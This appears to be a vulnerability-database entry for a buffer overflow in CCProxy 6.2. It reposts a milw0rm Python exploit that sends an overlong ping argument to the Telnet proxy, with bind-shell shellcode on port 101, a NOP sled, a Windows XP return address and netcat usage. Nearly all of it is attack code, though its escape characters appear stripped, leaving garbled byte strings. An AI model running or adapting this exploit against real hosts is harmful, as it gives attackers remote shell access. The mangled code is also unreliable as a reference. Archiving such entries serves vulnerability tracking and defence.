https://www.exploit-db.com/exploits/621
https://www.securityfocus.com/bid/82517
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1009

YoungZSoftCCProxy6.2及其早期版本存在缓冲区溢出漏洞。远程攻击者借助Telnet代理服务的ping（p）命令中的超长地址执行任意代码，该向量不同于CVE-2004-2416。

######################################################################
##  |------------------------------------------------------------|  ##
##  |    CCProxy 6.2 ping Remote Buffer Overflow Exploit         |  ##  
##  |      Based on Ruder's discovery,exploit by KaGra           |  ##  
##  |   Binds Shellcode aT 101,use netcat to connect back...     |  ##
##  |            Tested in WinXP SP1 EnGlish                     |  ##
##  |       Greedingz to:NinA,Coderz.gr and my musik BanD        |  ##
##  |------------------------------------------------------------|  ##
######################################################################

# Usage:exploit.py|nc Host port,where port is the telnet service of the target
# The buG exists when a long parameter is passed to ping command in telnet
# service of CCproxy server.This is a classic stack based overflow.Ret address
# is close to ESI,so a JMP ESI will do the trick.Other nops are just for padding...
#
#
#C:exploit.py|nc localhost 23
#
#C:nc -v localhost 101
#
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:Documents and Settingsxcv>





import struct

#BinD ShellCode aT PorT 101,taken from  muts exploit,thankz pul...

sc2 = "xEB"
sc2 += "x0Fx58x80x30x88x40x81x38x68x61x63x6Bx75xF4xEBx05xE8xECxFFxFF"
sc2 += "xFFx60xDEx88x88x88xDBxDDxDExDFx03xE4xACx90x03xCDxB4x03xDCx8D"
sc2 += "xF0x89x62x03xC2x90x03xD2xA8x89x63x6BxBAxC1x03xBCx03x89x66xB9"
sc2 += "x77x74xB9x48x24xB0x68xFCx8Fx49x47x85x89x4Fx63x7AxB3xF4xACx9C"
sc2 += "xFDx69x03xD2xACx89x63xEEx03x84xC3x03xD2x94x89x63x03x8Cx03x89"
sc2 += "x60x63x8AxB9x48xD7xD6xD5xD3x4Ax80x88xD6xE2xB8xD1xECx03x91x03"
sc2 += "xD3x84x03xD3x94x03x93x03xD3x80xDBxE0x06xC6x86x64x77x5Ex01x4F"
sc2 += "x09x64x88x89x88x88xDFxDExDBx01x6Dx60xAFx88x88x88x18x89x88x88"
sc2 += "x3Ex91x90x6Fx2Cx91xF8x61x6DxC1x0ExC1x2Cx92xF8x4Fx2Cx25xA6x61"
sc2 += "x51x81x7Dx25x43x65x74xB3xDFxDBxBAxD7xBBxBAx88xD3x05xC3xA8xD9"
sc2 += "x77x5Fx01x57x01x4Bx05xFDx9CxE2x8FxD1xD9xDBx77xBCx07x77xDDx8C"
sc2 += "xD1x01x8Cx06x6Ax7AxA3xAFxDCx77xBFx77xDDxB8xB9x48xD8xD8xD8xD8"
sc2 += "xC8xD8xC8xD8x77xDDxA4x01x4FxB9x53xDBxDBxE0x8Ax88x88xEDx01x68"
sc2 += "xE2x98xD8xDFx77xDDxACxDBxDFx77xDDxA0xDBxDCxDFx77xDDxA8x01x4F"
sc2 += "xE0xCBxC5xCCx88x01x6Bx0Fx72xB9x48x05xF4xACx24xE2x9DxD1x7Bx23"
sc2 += "x0Fx72x09x64xDCx88x88x88x4ExCCxACx98xCCxEEx4FxCCxACxB4x89x89"
sc2 += "x01xF4xACxC0x01xF4xACxC4x01xF4xACxD8x05xCCxACx98xDCxD8xD9xD9"
sc2 += "xD9xC9xD9xC1xD9xD9xDBxD9x77xFDx88xE0xFAx76x3Bx9Ex77xDDx8Cx77"
sc2 += "x58x01x6Ex77xFDx88xE0x25x51x8Dx46x77xDDx8Cx01x4BxE0x77x77x77"
sc2 += "x77x77xBEx77x5Bx77xFDx88xE0xF6x50x6AxFBx77xDDx8CxB9x53xDBx77"
sc2 += "x58x68x61x63x6Bx90"


buffer = 'x90'*605         # The usual nops... 

RETADDR="xc7x41xe6x77"  # JMP ESI In XP SP1 EnGliSH...

buff2='x90'*8              # padding...

print "ping "+buffer+sc2+RETADDR+buff2 # DeaD...

// milw0rm.com [2004-11-10]

Youngzsoft CCProxy 6.2

来源:www.youngzsoft.net
链接:http://www.youngzsoft.net/ccproxy/whatsnew.htm
来源:MILW0RM
名称:621
链接:http://www.milw0rm.com/exploits/621
来源:MILW0RM
名称:4360
链接:http://www.milw0rm.com/exploits/4360
来源:SECUNIA
名称:13085
链接:http://secunia.com/advisories/13085